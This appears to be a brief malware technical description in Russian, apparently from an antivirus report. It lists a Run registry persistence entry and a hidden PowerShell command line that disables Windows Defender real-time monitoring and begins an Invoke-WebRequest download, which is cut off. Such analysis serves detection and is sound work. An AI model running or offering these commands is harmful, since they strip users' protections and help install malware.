Техническая информация
- [HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run] 'Windows.exe' = '%WINDIR%.exe'
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Command Enable-WindowsOptionalFeature -Online -FeatureName "NetFx3" -All; Start-Sleep -Seconds 5; Set-MpPreference -DisableRealtimeMonitoring $true; Start-Sleep -Seconds 1; Invoke-WebRequest -...' (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Command Enable-WindowsOptionalFeature -Online -FeatureName "NetFx3" -All; Start-Sleep -Seconds 5; Set-MpPreference -DisableRealtimeMonitoring $true; Start-Sleep -Seconds 1; Invoke-WebRequest -...